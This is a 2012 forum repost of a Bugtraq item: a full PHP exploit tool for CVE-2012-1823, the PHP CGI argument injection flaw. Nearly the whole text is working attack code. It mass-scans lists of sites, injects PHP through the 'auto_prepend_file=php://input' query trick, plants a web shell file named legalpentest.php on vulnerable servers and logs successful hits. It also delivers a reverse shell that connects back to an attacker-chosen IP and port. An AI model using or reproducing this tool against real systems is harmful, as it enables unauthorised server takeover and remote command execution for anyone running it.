PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version

看板Bugtraq作者admin.時間13年前 (2012/06/03 18:32)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

<?php ######################################### www.bugreport.ir =20 ######################################## # # Title: PHP CGI Argument Injection Remote Exploit =20 V0.3 - PHP Version # Vendor: http://www.php.net # Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 # Exploitation: Remote # Original Advisory: =20 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ # Original Exploit URL: http://www.bugreport.ir/79/exploit.htm # CVE: CVE-2012-1823 # Coded By: Mostafa Azizi (admin[@]0-Day[dot]net) ############################################################################= ####################### /* This tool may be used for legal purposes only. Users take full =20 responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If =20 these terms are not acceptable to you, then do not use this tool.*/ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 10); ob_implicit_flush (1); echo'<html> <head> <title>PHP CGI Argument Injection Remote Exploit</title> </head> PHP CGI Argument =20 Injection Coded by: Mostafa =20 Azizi (admin[@]0-Day[dot]net) <body bgcolor=3D"#00000"> <table align=3D"center" border=3D"5"> <tr> <th>Mass File = =20 Uploader </th> <th></th> <th>Reverse =20 Shell </th> </tr> <tr> <td><form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20 enctype=3D"multipart/form-data" method=3D"post"> Please specify a file to =20 scan: <input type=3D"file" name=3D"listfile" =20 size=3D"40"> * Please specify a file to =20 upload: <input type=3D"file" name=3D"datafile" =20 size=3D"40"> * specify a port (default is 80): =20 <input name=3D"port" size=3D"20"> Proxy (ip:port): =20 <input name=3D"proxy" size=3D"20"> * fields are =20 required <input type=3D"submit" value=3D"Start Attack"= =20 name=3D"Submit"> </form> </td> <td></td> <td><form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20 enctype=3D"multipart/form-data" method=3D"post"> hostname (ex: =20 www.sitename.com):<input name=3D"host" size=3D"20"> Your IP (ex: =20 173.194.35.169 ): <input name=3D"lip" size=3D"20"> = =20 Your Port (ex: =20 80):<input name=3D"lport" size=3D"20"> All fields are =20 required <input type=3D"submit" value=3D"Start Attack"= =20 name=3D"Submit2"> </form> </td> </tr> </table> <table width=3D"90%"> <tbody> <tr> <td width=3D"43%" align=3D"left"> </td> </tr> </tbody> </table> </body></html>'; $host =3D $_POST['host']; $lip =3D $_POST['lip']; $lport =3D $_POST['lport']; $port =3D $_POST['port']; $proxy =3D $_POST['proxy']; $list =3D file($_FILES['listfile']['tmp_name']); $file =3D =20 base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])))= ; $shell =3D "gzinflate(base64_decode(\"$file\"))"; if (isset($_POST['Submit2']) && $host !=3D '' && $lip !=3D '' && $lport !=3D= '') { =09/*pentestmonkey's php-reverse-shell. =09Limitations: proc_open and stream_set_blocking require PHP version =20 4.3+, or 5+ */ /* Connect Back */ =09$payload =3D "<?php set_time_limit (0); \$VERSION =3D \"1.0\"; \$ip =3D = =20 '$lip'; \$port =3D $lport; \$chunk_size =3D 1400; \$write_a =3D null; =20 \$error_a =3D null; \$shell =3D 'uname -a; w; id; /bin/sh -i'; \$daemon =3D = =20 0;\$debug =3D 0; if (function_exists('pcntl_fork')) { \$pid =3D =20 pcntl_fork(); if (\$pid =3D=3D -1) { printit(\"ERROR: Can't fork\"); =20 exit(1);} if (\$pid) { exit(0);} if (posix_setsid() =3D=3D -1) { =20 printit(\"Error: Can't setsid()\"); exit(1); } \$daemon =3D 1;} else { =20 printit(\"WARNING: Failed to daemonise. This is quite common and not =20 fatal.\");}chdir(\"/\"); umask(0); \$sock =3D fsockopen(\$ip, \$port, =20 \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); =20 exit(1);} \$descriptorspec =3D array(0 =3D> array(\"pipe\", \"r\"),1 =3D> = =20 array(\"pipe\", \"w\"), 2 =3D> array(\"pipe\", \"w\"));\$process =3D =20 proc_open(\$shell, \$descriptorspec, \$pipes);if =20 (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); =20 exit(1);}stream_set_blocking(\$pipes[0], =20 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], =20 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened =20 reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { =20 printit(\"ERROR: Shell connection terminated\"); break;} if =20 (feof(\$pipes[1])) {printit(\"ERROR: Shell process =20 terminated\");break;}\$read_a =3D array(\$sock, \$pipes[1], =20 \$pipes[2]);\$num_changed_sockets =3D stream_select(\$read_a, \$write_a, =20 \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) =20 printit(\"SOCK READ\");\$input =3D fread(\$sock, =20 \$chunk_size);if(\$debug) printit(\"SOCK: =20 \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], =20 \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =3D =20 fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: =20 \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], =20 \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =3D =20 fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: =20 \$input\");fwrite(\$sock, =20 \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pip= es[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {pr= int \"\$string\n\";}} =20 ?>"; =09$packet =3D "POST =20 ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input =20 HTTP/1.1\r\n"; =09$packet .=3D "Host: ".$host."\r\n"; =09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter\r\n"; =09$packet .=3D "Content-Type: application/x-www-form-urlencoded\r\n"; =09$packet .=3D "Content-Length: ".strlen($payload)."\r\n\r\n"; =09$packet .=3D $payload."\r\n\r\n\r\n\r\n"; =09sendpacket($packet,1,0,0); }elseif (isset($_POST['Submit']) && $list !=3D '' && $file !=3D '') { if ($port=3D=3D'') {$port=3D80;} =09for ($n =3D0; $n < count($list); $n++) { $siteAddbackup =3D $list[$n]; $siteAdd=3Dstr_replace("http://","",$siteAddbackup); =20 preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$= siteAddbackup, =20 $match); =09=09$path =3D $match[1]; =09=09$pa =3D strstr(trim($siteAdd),$path); =09=09$host=3Dtrim(str_replace($pa,"",$siteAdd)); =09=09if ($path =3D=3D''){$path =3D "/"; } if ($proxy=3D=3D'') {$p=3D$path;} else {$p=3D'http://'.$host.$path;= } /* Checking =20 Availability */ =09=09$connection =3D fsockopen($host,$port); =09=09if (!$connection) // site is down { echo ' No response from =20 '.htmlentities($host).' ... '; =20 file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', =20 $siteAddbackup."\r\n", FILE_APPEND); } =09=09else // site is up { fclose($connection); Exploitable($host,$path,$p); } } } Function Exploitable($host,$path,$p) { global $html; $i=3D0; /* Checking Exploitability */ =09$packet =3D "GET ".$p."?-s HTTP/1.1\r\n"; =09$packet .=3D "Host: ".$host."\r\n"; =09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n"; =09sendpacket($packet,1,0,0); =09$str =3D array( =09=09'<code><span','<?'); =09=09foreach ($str as $value =3D> $search){ =09=09=09if(stristr($html, $search) =3D=3D TRUE) {$i=3D$i+1;}} =09switch($i) =09{ =09case 0: =09echo ''.$host.' Faild! '; =09break; =09case 2: =09echo ''.$host.' Exploitable '; =09Exploit($host,$path,$p); =09} } Function Exploit($host,$path,$p) { global $html, $shell; /* Exploiting */ =09$payload =3D "<?php \$myFile =3D \"legalpentest.php\"; \$filehandle =3D = =20 fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=3D$shell; =20 fwrite(\$filehandle, \$Data);fclose(\$filehandle);"; =09$packet =3D "POST =20 ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input =20 HTTP/1.1\r\n"; =09$packet .=3D "Host: ".$host."\r\n"; =09$packet .=3D "User-Agent: PHP CGI Argument Injection Exploiter\r\n"; =09$packet .=3D "Content-Type: application/x-www-form-urlencoded\r\n"; =09$packet .=3D "Content-Length: ".strlen($payload)."\r\n\r\n"; =09$packet .=3D $payload."\r\n\r\n\r\n\r\n"; =09sendpacket($packet,1,0,0); /* Check for successfully =20 uploaded */ =09$packet =3D "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n"; =09$packet .=3D "Host: ".$host."\r\n"; =09$packet .=3D "User-Agent: :) \r\n\r\n"; =09sendpacket($packet,1,0,0); =09if(stristr($html , '404 Not Found') =3D=3D true) =09=09{ =09=09echo ' Exploit =20 Faild... ------------------------------------------------------- </fon= t>'; =09=09} =09=09else { =09=09echo " Exploit =20 Succeeded... -------------------=" rel="nofollow">http://$host$path"."/legalpentest.php -------------------= ------------------------------------ "; =09=09file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', =20 "http://$host$path"."/legalpentest.php\r\n", FILE_APPEND); =09=09} } function sendpacket($packet,$response =3D 0,$output =3D 0,$s=3D0) { $proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy =3D=3D '') { $ock =3D fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from '.htmlentities($host).' ... '; stream_set_timeout($ock, 4); } } else { $parts =3D explode(':',$proxy); // echo 'Connecting to proxy: =20 '.$parts[0].':'.$parts[1].' ... '; $ock =3D fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from proxy... '; fclose($ock); } } if ($ock) { fputs($ock,$packet); if ($response =3D=3D 1) { if ($proxy =3D=3D '') { $html =3D ''; while (!feof($ock)) { $html .=3D fgets($ock); } } else { $html =3D ''; while ((!feof($ock)) or =20 (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .=3D fread($ock,1); } } } else $html =3D ''; fclose($ock); } } ?>

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 admin. 的文章

文章代碼(AID): #1FopqZ_R (Bugtraq)